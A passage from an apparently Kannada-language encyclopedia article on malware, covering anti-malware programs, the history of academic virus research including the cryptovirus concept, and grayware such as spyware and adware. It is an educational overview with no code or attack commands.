ಕಂಪ್ಯೂಟರಿನ ಬಳಿ ಸವಲತ್ತುಗಳ ಪ್ರೊಫೈಲ್‌ ಇರಬೇಕು ಮತ್ತು ಯಾವ ಬಳಕೆದಾರನಿಗೆ, ಯಾವ ಪ್ರೋಗ್ರಾಮ್‌ಗೆ ಯಾವ ಸವಲತ್ತನ್ನು ಬಳಸಬೇಕು ಎಂಬ ಅರಿವು ಇರಬೇಕು. ಹೊಸ ತಂತ್ರಾಂಶವನ್ನು ಅಳವಡಿಸಿದಲ್ಲಿ, ಹೊಸ ತಂತ್ರಲಿಪಿಗೆ ಡೀಫಾಲ್ಟ್‌ ಪ್ರೊಫೈಲ್‌ ಸಿದ್ಧಪಡಿಸಲು ಅಡ್ಮಿನಿಸ್ಟ್ರೇಟರ್‌ಗೆ ಗೊತ್ತಿರಬೇಕು.

ದುಷ್ಟ ಡಿವೈಸ್‌ ಡ್ರೈವರ್‌ ಗಳನ್ನು ಎದುರಿಸುವುದು ನಿರಂಕುಶ ದುಷ್ಟ ಕಾರ್ಯಕಾರಿಗಳನ್ನು ಎದುರಿಸುವುದಕ್ಕಿಂತ ಕಷ್ಟ. ವಿಎಂಎಸ್‌‌ನಲ್ಲಿ ಬಳಕೆಯಲ್ಲಿರುವ,ಉಪಯೋಗಕ್ಕೆ ಬರಬಹುದಾದ ಎರಡು ತಂತ್ರಗಳೆಂದರೆ, ಮೆಮೊರಿ ಸಂಯೋಜನೆ ನಿರ್ದಿಷ್ಟ ಸಾಧನವನ್ನು ಮಾತ್ರ ನೋಂದಾಯಿಸಿಕೊಳ್ಳುತ್ತದೆ ಮತ್ತು ಸಾಧನದ ಮಧ್ಯಸ್ಥಿಕೆಯಲ್ಲಿ ಡ್ರೈವರ್‌ಗೆ ಸಂಬಂಧಿಸಿದ ಒಂದು ಸಿಸ್ಟಮ್‌ ಇಂಟರ್‌ಫೇಸ್‌.

ಇತರೆ ಮಾರ್ಗಗಳೆಂದರೆ:

ಈ ಮಾರ್ಗಗಳು, ಪೂರ್ತಿಯಾಗಿ ’ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್‌’ನಲ್ಲಿ ಸಂಯೋಜಿತವಾಗಿಲ್ಲದಿದ್ದರೂ, ಪ್ರಯತ್ನಗಳನ್ನು ಪುನರ್‌ ನಕಲಿ ಮಾಡುತ್ತವೆ ಮತ್ತು ಸಾರ್ವಕಾಲಿಕವಾಗಿ ಅನ್ವಯವಾಗುವುದಿಲ್ಲ, ಎರಡೂ ಸುರಕ್ಷತೆಗೆ ಅಪಾಯಕಾರಿ.

ಮಾಲ್‌ವೇರ್‌‍-ನಿರೋಧಕ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು

[ಬದಲಾಯಿಸಿ]

ಮಾಲ್‌ವೇರ್‌ ಆಕ್ರಮಣವು ಹೆಚ್ಚಾಗುತ್ತಿದ್ದಂತೆ ವೈರಸ್‌ ಮತ್ತು ಸ್ಪೈವೇರ್‌ ರಕ್ಷಣೆಯಿಂದ ಮಾಲ್‌ವೇರ್‌ ರಕ್ಷಣೆಯ ಕಡೆಗೆ ಗಮನವನ್ನು ಕೇಂದ್ರೀಕರಿಸಲಾಯಿತು, ವಿಶೇಷ ಪ್ರೋಗ್ರಾಮ್‌ ಅನ್ನು ಇದರ ವಿರುದ್ಧ ಹೋರಾಡಲು ಅಭಿವೃದ್ಧಿಪಡಿಸಲಾಯಿತು.

ಮಾಲ್‌ವೇರ್-ನಿರೋಧಕ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು ಮಾಲ್‌ವೇರ್‌ಗಳ ವಿರುದ್ಧ ಎರಡು ರೀತಿಯಲ್ಲಿ ಹೋರಾಡುತ್ತವೆ:

  1. ಅವು ಸಮಯಕ್ಕೆ ಸರಿಯಾದ ರಕ್ಷಣೆಯನ್ನು ಮಾಲ್‌ವೇರ್‌ ತಂತ್ರಾಂಶ ಸ್ಥಾಪನೆಯಾಗುವುದರ ವಿರುದ್ಧ ನೀಡುತ್ತವೆ. ಈ ರೀತಿಯ ಸ್ಪೈವೇರ್‌ ರಕ್ಷಣೆಯ ಕೆಲಸವನ್ನು ವೈರಸ್‌ ನಿರೋಧಕ ಕೆಲಸದಂತೆ ಮಾಡುತ್ತವೆ. ಇಲ್ಲಿ ಮಾಲ್‌ವೇರ್‌ ನಿರೋಧಕ ತಂತ್ರಾಂಶವು ಎಲ್ಲ ಒಳಬರುವ ದತ್ತಾಂಶಗಳನ್ನು ಮಾಲ್‌ವೇರ್‌‍ ತಂತ್ರಾಂಶದ ಸಲುವಾಗಿ ಸ್ಕ್ಯಾನ್‌ ಮಾಡುತ್ತದೆ ಮತ್ತು ಇದು ಯಾವುದೇ ಬೆದರಿಕೆಗಳು ಕಂಡುಬಂದಲ್ಲಿ ಅದನ್ನು ತಡೆಯುತ್ತದೆ.
  2. ಮಾಲ್‌ವೇರ್‌ ನಿರೋಧಕ ತಂತ್ರಾಂಶಗಳನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಈಗಾಗಲೇ ಗಣಕದಲ್ಲಿ ಸ್ಥಾಪಿಸಲಾದ ಮಾಲ್‌ವೇರ್‌ ತಂತ್ರಾಂಶಗಳನ್ನು ಗುರುತಿಸಿ ತೆಗೆಯುವಲ್ಲಿ ಅದು ಸಹಾಯ ಮಾಡುತ್ತದೆ.

ಈ ರೀತಿಯ ಮಾಲ್‌ವೇರ್ ರಕ್ಷಣೆಯು ಸಾಮಾನ್ಯವಾಗಿ ಉಪಯೋಗಿಸಲು ಸುಲಭವಾಗಿದ್ದು ಹೆಚ್ಚು ಜನಪ್ರಿಯವಾಗಿದೆ.[ಸೂಕ್ತ ಉಲ್ಲೇಖನ ಬೇಕು]

ಈ ರೀತಿಯ ಮಾಲ್‌ವೇರ್‌ ನಿರೋಧಕ ತಂತ್ರಾಂಶಗಳು ವಿಂಡೋಸ್‌ನ ನೋಂದಣಿ, ಆಪರೇಟಿಂಗ್‌ ಸಿಸ್ಟಮ್‌ನ ಕಡತಗಳು ಮತ್ತು ಗಣಕದಲ್ಲಿ ಸ್ಥಾಪಿತ ಪ್ರೊಗ್ರಾಮ್‌ಗಳನ್ನು ಸ್ಕ್ಯಾನ್‌ ಮಾಡುತ್ತದೆ ಮತ್ತು ಯಾವುದಾದರೂ ಬೆದರಿಕೆ ಕಂಡುಬಂದಲ್ಲಿ ಅದರ ಪಟ್ಟಿಯನ್ನು ಉಪಯೋಗಿಸುವವರಿಗೆ ಯಾವ ಕಡತವನ್ನು ಇಟ್ಟುಕೊಳ್ಳುವುದು ಮತ್ತು ತೆಗೆದು ಹಾಕುವುದು ಎಂಬುದನ್ನು ನಿರ್ಧರಿಸಲು ಅವಕಾಶ ಮಾಡಿಕೊಡುತ್ತದೆ. ಅಲ್ಲದೆ ಈ ಪಟ್ಟಿಯನ್ನು ಪರಿಚಿತ ಮಾಲ್‌ವೇರ್ ತಂತ್ರಾಂಶ ಪಟ್ಟಿಯ ಜೊತೆಗೆ ಹೋಲಿಕೆ ಮಾಡುವ ಮೂಲಕ, ಹೊಂದಾಣಿಕೆಯ ಕಡತಗಳನ್ನು ತೆಗೆಯಲು ಅನುಕೂಲವಾಗುವಂತೆ ಮಾಡುತ್ತದೆ.

ಮಾಲ್‌ವೇರ್‌‍ ಕೆಲಸಗಳಿಂದ ರಕ್ಷಣೆಗಾಗಿ ಬಳಸುವ ರಿಯಲ್‌-ಟೈಮ್‌ ಪ್ರೊಟೆಕ್ಷನ್‌‍ ಇದು ಗುರುತರವಾಗಿ ರಿಯಲ್‍-ಟೈಮ್‌ ವೈರಸ್‌ ನಿರೋಧಕದಂತೆ ಕೆಲಸ ಮಾಡುತ್ತದೆ. ಈ ತಂತ್ರಾಂಶವು ಡಿಸ್ಕ್‌ಫೈಲ್‌ಗಳನ್ನು ಡೌನ್‌ಲೋಡ್‌ ಮಾಡುವ ಸಮಯದಲ್ಲೇ ಸ್ಕ್ಯಾನ್‌ ಮಾಡುತ್ತದೆ ಮತ್ತು ಮಾಲ್‌ವೇರ್‌ಗಳನ್ನು ಪ್ರತಿನಿಧಿಸುವ ಚಟುವಟಿಕೆಗಳನ್ನು ತಡೆಯುತ್ತದೆ. ಕೆಲವು ಸಂದರ್ಭಗಳಲ್ಲಿ ಇದು ಸ್ಟಾರ್ಟ್‌-ಅಪ್‌ ಐಟಮ್‌ಗಳನ್ನು ಅಥವಾ ಬ್ರೌಸರ್‌ ವ್ಯವಸ್ಥೆಯನ್ನು ಬದಲು ಮಾಡುವ ಪ್ರಯತ್ನವನ್ನು ತಡೆಯುತ್ತದೆ. ಏಕೆಂದರೆ ಹಲವಾರು ಮಾಲ್‌ವೇರ್‌ ಘಟಕಗಳು ಬ್ರೌಸರ್‌ಗಳ ಕಾರಣದಿಂದಾಗಿ ಅಥವಾ ಉಪಯೋಗಿಸುವವರ ತಪ್ಪಿನಿಂದಾಗಿ ಸ್ಥಾಪಿತವಾಗುತ್ತವೆ. ಅಲ್ಲದೆ ’ಸ್ಯಾಂಡ್‌ಬಾಕ್ಸ್’ ಬ್ರೌಸರ್‌ಗೆ (ತಪ್ಪದೆ, ಬಳಕೆದಾರರಿಗೆ ಅವರು ಬಳಸುವ ಬ್ರೌಸರ್‌ ಕುರಿತಾಗಿ ಸರಿಯಾದ ಮಾಹಿತಿಯನ್ನು ನೀಡುವುದು ಒಳಿತು) ಬಳಸುವ ಕೆಲವು ರಕ್ಷಣಾ ತಂತ್ರಾಂಶಗಳು (ಇವುಗಳಲ್ಲಿ ಕೆಲವು ಮಾಲ್‌ವೇರ್‌ ನಿರೋಧಕ ಕೆಲವು ಮಾಲ್‌ವೇರ್‌ ನಿರೋಧಕಗಳಲ್ಲ) ಗಣಕಕ್ಕೆ ಉಂಟಾಗುವ ಹಾನಿಯನ್ನು ತಪ್ಪಿಸುವಲ್ಲಿ ಸಹಾಯ ಮಾಡುತ್ತವೆ.

ಮಾಲ್‌ವೇರ್‌ ತಂತ್ರಾಂಶದ ಕುರಿತಾದ ಶೈಕ್ಷಣಿಕ ಸಂಶೋಧನೆ: ಸಂಕ್ಷಿಪ್ತ ಸಮೀಕ್ಷೆ

[ಬದಲಾಯಿಸಿ]

ಸ್ವ-ಮರುಪೂರ್ಣಗೊಳ್ಳುವ ಗಣಕ ಕಲ್ಪನೆಯು ಸುಮಾರು ೧೯೪೯ರಲ್ಲಿ ಜಾನ್‌ ವೊನ್‌ ನ್ಯೂಮನ್‌‍ ಅವರು ನೀಡಿದ ಉಪನ್ಯಾಸವು ಸಂಕೀರ್ಣ ಅಟೊಮ್ಯಾಟಾಗಳ ಸಿದ್ಧಾಂತ ಮತ್ತು ಸಾಂಸ್ಥಿಕರಣದ ಕಲ್ಪನೆಯನ್ನು ಮೀರಿತ್ತು.[೧೫] ನ್ಯೂಮನ್‌ ಅವರು ತಮ್ಮ ಸಿದ್ಧಾಂತದಲ್ಲಿ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು ತಂತಾನೆ ಮರುರೂಪುಗೊಳ್ಳುವುದನ್ನು ಮಂಡಿಸಿದ್ದರು. ಇದು ಸಂಭವನೀಯ ಫಲಿತಾಂಶವನ್ನು ಕಂಪ್ಯೂಟಾಬಿಲಿಟಿ ಸಿದ್ಧಾಂತದ ಕುರಿತು ಹೊಂದಿತ್ತು. ಫ್ರೆಡ್‌ ಕೋಹೆನ್‌ ಗಣಕ ವೈರಸ್‌ಗಳು ಮತ್ತು ನಿರ್ಧರಿತ ನ್ಯೂಮನ್‌ನ ಸಿದ್ಧಾಂತವನ್ನು ಕುರಿತಾಗಿ ಪ್ರಯೋಗ ಮಾಡಿದನು. ಅವನು ಮಾಲ್‌ವೇರ್‌ ಕುರಿತಾದ ಇತರ ಸ್ವತ್ತುಗಳ ಕುರಿತಾಗಿಯೂ (ಕಂಡುಹಿಡಿಯುವಿಕೆ ಮತ್ತು ಮೂಲ ಗೂಢ ಲಿಪೀಕರಣವನ್ನು ಸ್ವ-ಕಾರ್ಯಕ್ಷಮತೆ ಕಡಿಮೆಯಾಗುವ ಪ್ರೊಗ್ರಾಮ್‌ಗಳನ್ನು ಅವನು "ವಿಕಸಿತ"ವಾದವುಗಳು ಮತ್ತು ಇತರೇ ಹೆಸರುಗಳಿಂದ ಕರೆದನು). ಅವನು ೧೯೮೮ರಲ್ಲಿ ತನ್ನ ಡಾಕ್ಟರೇಟ್‌ ಸಲುವಾಗಿ ಮಂಡಿಸಿದ ಪ್ರೌಢ ಪ್ರಬಂಧದ ವಿಷಯವು ಗಣಕ ವೈರಸ್‌ ಕುರಿತಾದುದಾಗಿತ್ತು.[೧೬] ಕೊಹೆನ್‌ನ ಅಧ್ಯಾಪಕ ಸಲಹೆಗಾರರಾಗಿದ್ದ ಲಿಯೊನಾರ್ಡ್ ಅಡ್ಲ್‌ಮನ್‌ (RSAಯಲ್ಲಿಯ A) ಕೂಲಂಕುಷವಾದ ಆಧಾರವನ್ನು ನೀಡುತ್ತಾ, ಸಾಮಾನ್ಯ ಪ್ರಕರಣಗಳಲ್ಲಿ, ಗಣನ ಪದ್ಧತಿಯ ಪ್ರಕಾರ ವೈರಸ್‌ ಇದೆಯೋ ಇಲ್ಲವೊ ಎಂಬುದನ್ನು ಕಂಡುಕೊಳ್ಳುವುದು ಸಾಧ್ಯವಾಗುವುದಿಲ್ಲ ಎಂದು ಮಂಡಿಸಿದ್ದನು.[೧೭] ಇದನ್ನು ವೈರಸ್‌ಗಳು ಇಲ್ಲದ ಹೆಚ್ಚಿನ ವರ್ಗದ ಪ್ರೊಗ್ರಾಮ್‌ಗಳಲ್ಲಿ ಇರುವ ಸಮಸ್ಯೆಯನ್ನು ಗುರುತಿಸುವ ಸಲುವಾಗಿ ಮಾಡಿರುವ ಪ್ರೊಗ್ರಾಮ್‌ ಆಗಿರುವುದಿಲ್ಲ.ಅಲ್ಲದೆ ಈ ಸಮಸ್ಯೆಯು ಇದಕ್ಕಿಂತ ಭಿನ್ನವಾಗಿದ್ದು, ಇದು ಎಲ್ಲ ವೈರಸ್‌ಗಳನ್ನು ಕಂಡುಹಿಡಿಯುವ ಸಾಮರ್ಥ್ಯವನ್ನು ಹೊಂದಿರಬೇಕೆಂದೇನೂ ಇಲ್ಲ. ಅಲ್ಡೆಮನ್‌ನ ಈ ಆಧಾರವು ಈವರೆಗಿನ ಮಾಲ್‌ವೇರ್‌ ಕಂಪ್ಯೂಟಾಬಿಲಿಟಿ ಸಿದ್ಧಾಂತವು ಕ್ಯಾಂಟರ್‌ನ ಡಯಾಗ್ನಲ್‌ ಸಿದ್ಧಾಂತ ಹಾಗೂ ಸಮಸ್ಯೆಯನ್ನು ತಡೆಯನ್ನು ಆಧಾರವಾಗಿರಿಸಿಕೊಂಡಿದೆ. ಆದರೆ ಇದರಲ್ಲಿಯ ವ್ಯಂಗ್ಯವೇನೆಂದರೆ, ಇದನ್ನು ಮುಂದೆ ಯೂಂಗ್‌ ಮತ್ತು ಯಂಗ್‌ರು ಅಲ್ಡೆಮನ್‌ನ ಕ್ರಿಪ್ಟೊಗ್ರಫಿಯ ಕುರಿತಾದ ಕೆಲಸವು ವಿರುದ್ಧ ಇಂಜಿನಿಯರಿಂಗ್‌‌‍ ವಿರುದ್ಧ ಅತ್ಯುತ್ತಮ ನಿರೋಧಕ ಶಕ್ತಿಯನ್ನು ಹೊಂದಿರುವ ವೈರಸ್‌ ಹುಟ್ಟುಹಾಕಲು ಆದರ್ಶ ಸಿದ್ಧಾಂತವಾಗಿ ಬಳಸಬಹುದು ಎಂದು ಕ್ರಿಪ್ಟೊವೈರಸ್‌‍ ಕುರಿತಾದ ಕಲ್ಪನೆಯನ್ನು ಮಂಡಿಸಿದರು.[೧೮] ಕ್ರಿಪ್ಟೊವೈರಸ್‌ ಇದು ಒಂದು ವೈರಸ್‌ ಆಗಿದ್ದು ಇದು ಯಾದೃಚ್ಚಿಕವಾಗಿ ಸಾರ್ವಜನಿಕ ಕೀ ಮತ್ತು ಸಿಮೆಟ್ರಿಕ್‌ ಸೈಫರ್‌ಇನಿಷಿಯಲೈಸೇಷನ್‌ ವೆಕ್ಟರ್‌‍ (IV) ಮತ್ತು ಸೆಷನ್‌ ಕೀ (SK)ಯನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತದೆ. ಕ್ರಿಫ್ಟೊವೈರಲ್‌ ಒತ್ತಾಯದ ಆಕ್ರಮಣದಲ್ಲಿ ವೈರಸ್ ತುತ್ತಾದ ಗಣಕದಲ್ಲಿಯ ಸಾಮಾನ್ಯ ಪಠ್ಯದ ದತ್ತಾಂಶಗಳನ್ನು ಯಾದೃಚ್ಚಿಕವಾಗಿ ಹುಟ್ಟು ಹಾಕಲಾದ IV ಮತ್ತು SKಗಳ ಮೂಲಕ ಗೂಢ ಲಿಪೀಕರಣಗೊಳಿಸಲಾಗುತ್ತದೆ. ನಂತರ IV+SKಗಳನ್ನು ವೈರಸ್‌ ಬರವಣಿಗೆಗಾರನ ಸಾರ್ವಜನಿಕ ಕೀಯನ್ನು ಬಳಸುವ ಮೂಲಕ ಗೂಢ ಲಿಪೀಕರಣಗೊಳಿಸಲಾಗುತ್ತದೆ. ಈ ಸಿದ್ಧಾಂತದಲ್ಲಿ ಬಲಿಪಶುವು ವೈರಸ್‌ ಬರೆದವನಲ್ಲಿ ಸಂಧಾನ ಮಾಡಿಕೊಳ್ಳುವ ಮೂಲಕ ಸೈಪರಟೆಕ್ಸ್ಟ್‌ ಅನ್ನು ಡಿಕ್ರಿಪ್ಟ್ ಮಾಡುವ ಸಲುವಾಗಿ IV+SKಯನ್ನು ಹಿಂಪಡೆಯಬೇಕಾಗುತ್ತದೆ. (ಯಾವುದೇ ಬ್ಯಾಕ್‌ಅಪ್‌ ಅನ್ನು ಉಳಿಸಿಕೊಂಡಿಲ್ಲ ಎಂದು ಊಹಿಸುತ್ತಾ) ವೈರಸ್‌ನ ವಿಶ್ಲೇಷಣೆಯು ಸಾರ್ವಜನಿಕ ಕೀಯನ್ನು ಬಹಿರಂಗಪಡಿಸುತ್ತದೆ, ಆದರೆ IV ಮತ್ತು SKಗಳನ್ನು ಪಡೆಯಲು ಡಿಕ್ರಿಪ್ಷನ್‌ ಅಗತ್ಯವಿರುತ್ತದೆ. ಇದರ ಫಲಿತಾಂಶವು ಮೊಟ್ಟಮೊದಲು ಕಂಪ್ಯೂಟೇಷನಲ್‌ ಕಾಂಪ್ಲೆಕ್ಸಿಟಿ ಸಿದ್ಧಾಂತವನ್ನು ವಿರುದ್ಧ ಇಂಜಿನಿಯರಿಂಗ್‌ಗೆ ದೃಢ ವಿರೋಧ ವ್ಯಕ್ತಪಡಿಸುವ ಮಾಲ್‌ವೇರ್‌ ಅನ್ನು ಕಂಡುಹಿಡಿಯಲು ಬಳಸಬಹುದೆಂದು ತೋರಿಸಿಕೊಟ್ಟಿತು.

ಗಣಕ ವೈರಸ್ ಸಂಶೋಧನೆಯ ಇನ್ನೊಂದು ಬೆಳವಣಿಗೆಯ ಕ್ಷೇತ್ರವೆಂದರೆ ಲೊಕ್ಟಾ-ವೊಲ್ಟೆರಾ ಸಮೀಕರಣವನ್ನು ಬಳಸಿ ಗಣಿತದ ಮಾದರಿಗಳನ್ನು ಸೃಷ್ಟಿಸುವ ಮೂಲಕ ವರ್ಮ್‌ಗಳ ನಡತೆಗಳನ್ನು ಪಟ್ಟಿಮಾಡುವುದು, ಇದನ್ನು ಜೈವಿಕ ವೈರಸ್‌ಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡುವಾಗ ಬಳಸಲಾಗುತ್ತದೆ. ಹಲವಾರು ವೈರಸ್‌ಗಳ ಪುನರುತ್ಪತ್ತಿ ಮಾದರಿಯನ್ನು ಹಲವಾರು ಸಂಶೋಧಕರು ಅಧ್ಯಯನ ಮಾಡಿದ್ದಾರೆ. ಅವುಗಳಲ್ಲಿ ಗಣಕ ವೈರಸ್‌ನ ಪುನರುತ್ಪತ್ತಿ, ಪ್ರಿಡೇಟರ್‌ ಕೋಡ್‌ಗಳು‌[೧೯][೨೦] ರೀತಿಯ ವೈರಸ್‌ ವಿರುದ್ಧ ವೈರಸ್‌ಗಳ ಹೋರಾಟ, ಪ್ಯಾಚಿಂಗ್‌ನ ಪರಿಣಾಮ ಮುಂತಾದವುಗಳು ಸೇರಿವೆ.

ಗ್ರೇ ವೇರ್

[ಬದಲಾಯಿಸಿ]

ಗ್ರೇವೇರ್[೨೧] (ಗ್ರೆವೇರ್)ಅನ್ನುವುದು ಸಾಮಾನ್ಯ ಹೆಸರಾಗಿದ್ದು, ಇದನ್ನು ಕೆಲವು ಸಂದರ್ಭದಲ್ಲಿ, ಕಿರಿಕಿರಿವುಂಟು ಮಾಡುವ ಅಥವಾ ಅನಪೇಕ್ಷಣೀಯ ಮತ್ತು ಮಾಲ್‌ವೇರ‍್ಗಿಂತ ಕಡಿಮೆ ಗಂಭೀರವಾಗಿರುವ ಅಥವಾ ಕಡಿಮೆ ತೊಂದರೆಗೀಡು ಮಾಡುವ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ವರ್ಗೀಕರಣವನ್ನು ಸೂಚಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ.[೨೨] ಸ್ಪೈವೇರ್, ಆ‍ಯ್‌ಡ್‌ವೇರ್, ಡೈಲರ್ಸ್, ಜೋಕ್ ಪ್ರೊಗ್ರಾಮ್ಸ್, ಪರೋಕ್ಷ ಪ್ರವೇಶಾಧಿಕಾರ ಪಡೆಯಬಲ್ಲ ಟೂಲ್‌ಗಳು ಮತ್ತು ಯಾವುದೇ ಇತರೆ ಸ್ವಾಗತಾರ್ಹವಲ್ಲದ ಕಡತಗಳು ಮತ್ತು ವೈರಸ್‌ಗಳನ್ನು ಬಿಟ್ಟು ನಿಮ್ಮ ನೆಟ್‌ವರ್ಕ್‌ನಲ್ಲಿ ಕಂಪ್ಯೂಟರ್ಯಂತ್ರದ ಕಾರ್ಯಾಚರಣೆಯನ್ನು ಹಾನಿಗೀಡು ಮಾಡುವಂತೆ ವಿನ್ಯಾಸಗೊಂಡಿರುವ ಪ್ರೊಗ್ರಾಂಗಳನ್ನು ಗ್ರೇವೇರ್ ಒಳಗೊಂಡಿರುತ್ತದೆ. ಈ ಹೆಸರು ಸೆಪ್ಟೆಂಬರ್ ೨೦೦೪ರ ಆರಂಭದಿಂದಲೂ ಬಳಕೆಯಲ್ಲಿದೆ.[೨೩]

ಗ್ರೇವೇರ್ ವೈರಸ್‌ಗಳು ಅಥವಾ ಟ್ರೊಜನ್ ಹಾರ್ಸ್‌ ಪ್ರೊಗ್ರಾಂಗಳಾಗಿ ವರ್ಗೀಕರಣಗೊಂಡಿರದ ಅಪ್ಲಿಕೇಶನ್ಸ್ ಅಥವಾ ಕಡತಗಳ ಕುರಿತು ಹೇಳುತ್ತದೆ. ಆದರೂ ಇವು ನಿಮ್ಮ ನೆಟ್‍ವರ್ಕ್‌ನಲ್ಲಿನ ಕಂಪ್ಯೂಟರ್ದ ಕಾರ್ಯಾಚರಣೆಯನ್ನು ನಕರಾತ್ಮಕವಾಗಿ ಪ್ರಭಾವಿಸುತ್ತದೆ ಮತ್ತು ನಿಮ್ಮ ಸಂಸ್ಥೆಯ ಭದ್ರತೆಗೆ ಸಂಬಂಧಿಸಿದ ಪ್ರಮುಖ ಅಪಾಯಗಳಿಗೆ ಈಡುಮಾಡುತ್ತದೆ.[೨೪] ಆಗಾಗ ಗ್ರೇವೇರ್ ವಿವಿಧ ಅನಪೇಕ್ಷಿತ ಕಾರ್ಯಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ, ಅವುಗಳೆಂದರೆ ಪಾಪ್-ಅಪ್ ವಿಂಡೋಸ್‌‌ಗಳ ಮೂಲಕ ಬಳಕೆದಾರರಿಗೆ ಕಿರಿಕಿರಿವುಂಟು ಮಾಡುವುದು, ಬಳಕೆದಾರ ಹವ್ಯಾಸಗಳನ್ನು ಹಿಂಬಾಲಿಸುವುದು ಮತ್ತು ಕಂಪ್ಯೂಟರ್ವನ್ನು ಆಕ್ರಮಣಕ್ಕೀಡು ಮಾಡಬಹುದಾದ ಸಾಧ್ಯತೆಗಳನ್ನು ಅನವಶ್ಯಕವಾಗಿ ತೋರಿಸುತ್ತದೆ.

  • ಸ್ಪೈವೇರ್ ಒಂದು ತಂತ್ರಾಂಶವಾಗಿದ್ದು, ಅದು ಅಂತರಜಾಲ ಹುಡುಕಾಟದ ಅಭ್ಯಾಸಗಳನ್ನು ದಾಖಲಿಸುವ ಉದ್ದೇಶಕ್ಕಾಗಿ ಘಟಕಗಳನ್ನು ಗಣಕದಲ್ಲಿ ಅಳವಡಿಸುತ್ತದೆ (ಮುಖ್ಯವಾಗಿ ಮಾರುಕಟ್ಟೆ ಉದ್ದೇಶಗಳಿಗೆ). ಸ್ಪೈವೇರ್ ಈ ಮಾಹಿತಿಯನ್ನು ಕಂಪ್ಯೂಟರ್ ಆನ್‌ಲೈನ್‌ನಲ್ಲಿದ್ದಾಗ ತನ್ನ ಸೃಷ್ಟಿಕರ್ತ ಅಥವಾ ಇನ್ನಿತರ ಆಸಕ್ತಿಯುತ ಗುಂಪುಗಳಿಗೆ ರವಾನಿಸುತ್ತದೆ. ಸ್ಪೈವೇರುಗಳು ಹಲವು ಬಾರಿ ’ಉಚಿತ ಡೌನ್‌ಲೋಡ್‌ಗಳು’ ಎಂದು ಗುರುತಿಸಲ್ಪಡುವ ಘಟಕಗಳ ಜೊತೆ ಡೌನ್‌ಲೋಡ್ ಆಗುತ್ತವೆ ಮತ್ತು ತನ್ನ ಅಸ್ತಿತ್ವದ ಬಗ್ಗೆ ಬಳಕೆದಾರಿಗೆ ಸೂಚಿಸುವುದಿಲ್ಲ ಅಥವಾ ಘಟಕಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳಲು ಅನುಮತಿ ಕೇಳುವುದಿಲ್ಲ. ಸ್ಪೈವೇರ್ ಘಟಕಗಳು ಸಂಗ್ರಹಿಸುವ ಮಾಹಿತಿಗಳಲ್ಲಿ ಬಳಕೆದಾರನ ಕೀಸ್ಟ್ರೋಕ್‌ಗಳು ಸೇರಿರುತ್ತವೆ. ಅಂದರೆ ಖಾಸಗಿ ಮಾಹಿತಿಗಳಾದ ಲಾಗಿನ್‌ ಹೆಸರುಗಳು, ಪಾಸ್‌ವರ್ಡ್‌ಗಳು ಮತ್ತು ಕ್ರೆಡಿಟ್ ಕಾರ್ಡ್ ಸಂಖ್ಯೆಗಳನ್ನು ಸುಲಭವಾಗಿ ಕದಿಯಬಹುದಾಗಿದೆ. ಸ್ಪೈವೇರ್ ದತ್ತಾಂಶಗಳನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ. ಉದಾಹರಣೆಗೆ ಖಾತೆ ಬಳಕೆದಾರರ ಹೆಸರು, ಪಾಸ್‌ವರ್ಡ್ಸ್, ಕ್ರೆಡಿಟ್ ಕಾರ್ಡ್ ಸಂಖ್ಯೆಗಳು ಮತ್ತು ಇತರೆ ರಹಸ್ಯ ಮಾಹಿತಿಗಳು ಮತ್ತು ಅದನ್ನು ಮೂರನೇ ವ್ಯಕ್ತಿಗೆ ವರ್ಗಾಯಿಸುತ್ತದೆ.
  • ಆ‍ಯ್‌ಡ್‌‍ವೇರ್ ಒಂದು ತಂತ್ರಾಂಶವಾಗಿದ್ದು, ಇದು ಜಾಹೀರಾತು ಬ್ಯಾನರುಗಳನ್ನು ಜಾಲತಾಣಗಳ ಬ್ರೊಸರ್‌ಗಳಾದ ಇಂಟರ್‍ನೆಟ್ ಎಕ್ಸ್‌ಪ್ಲೋರರ್ ಮತ್ತು ಮೊಜಿಲ್ಲಾ ಫೈರ್‌ಫೊಕ್ಸ್ ಇವುಗಳಲ್ಲಿ ಪ್ರದರ್ಶಿಸುತ್ತದೆ. ಇದನ್ನು ಮಾಲ್‌ವೇರ್ ಎಂದು ವಿಂಗಡಿಸಲಾಗದಿದ್ದರೂ,ಹಲವು ಬಳಕೆದಾರರು ಇದನ್ನು ಆಕ್ರಮಣಶೀಲ ಎಂದೇ ಪರಿಗಣಿಸುತ್ತಾರೆ. ಆ‍ಯ್‌ಡ್‌‍ವೇರ್ ಪ್ರೊಗ್ರಾಮುಗಳು ಸಿಸ್ಟಮಿನಲ್ಲಿ ಬಹಳ ಸಲ ಅನಪೇಕ್ಷಿತ ಪರಿಣಾಮಗಳನ್ನು ಉಂಟು ಮಾಡುತ್ತವೆ. ಹೇಗೆಂದರೆ ಪೊಪ್ ಅಪ್ ಜಾಹೀರಾತುಗಳಿಂದ ಕಿರಿಕಿರಿಯನ್ನು ಮಾಡುವುದು ಮತ್ತು ನೆಟ್‌ವರ್ಕಿನ ಸಂಪರ್ಕ ಅಥವಾ ಸಿಸ್ಟಮ್‌ನ ಕಾರ್ಯಾಚರಣೆಯನ್ನು ಕುಂಠಿತಗೊಳಿಸುವುದು. ಆ‍ಯ್‌ಡ್‌‍ವೇರ್ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು ಕೆಲವು ಉಚಿತ ತಂತ್ರಾಂಶಗಳ ಜೊತೆ ಸೇರಿಕೊಂಡು ಪ್ರತ್ಯೇಕ ಪ್ರೊಗ್ರಾಮ್‌ಗಳೆಂದು ವಿಶಿಷ್ಟವಾಗಿ ಸ್ಥಾಪನೆಯಾಗುತ್ತವೆ. ಹಲವು ಬಳಕೆದಾರರು ಉಚಿತ ತಂತ್ರಾಂಶದಎಂಡ್ ಯುಸರ್ ಲೈಸನ್ಸ್ ಅಗ್ರಿಮೆಂಟ್ (EULA) ಅನ್ನು ಒಪ್ಪಿಕೊಳ್ಳುವಾಗ ಅದರ ಜೊತೆ 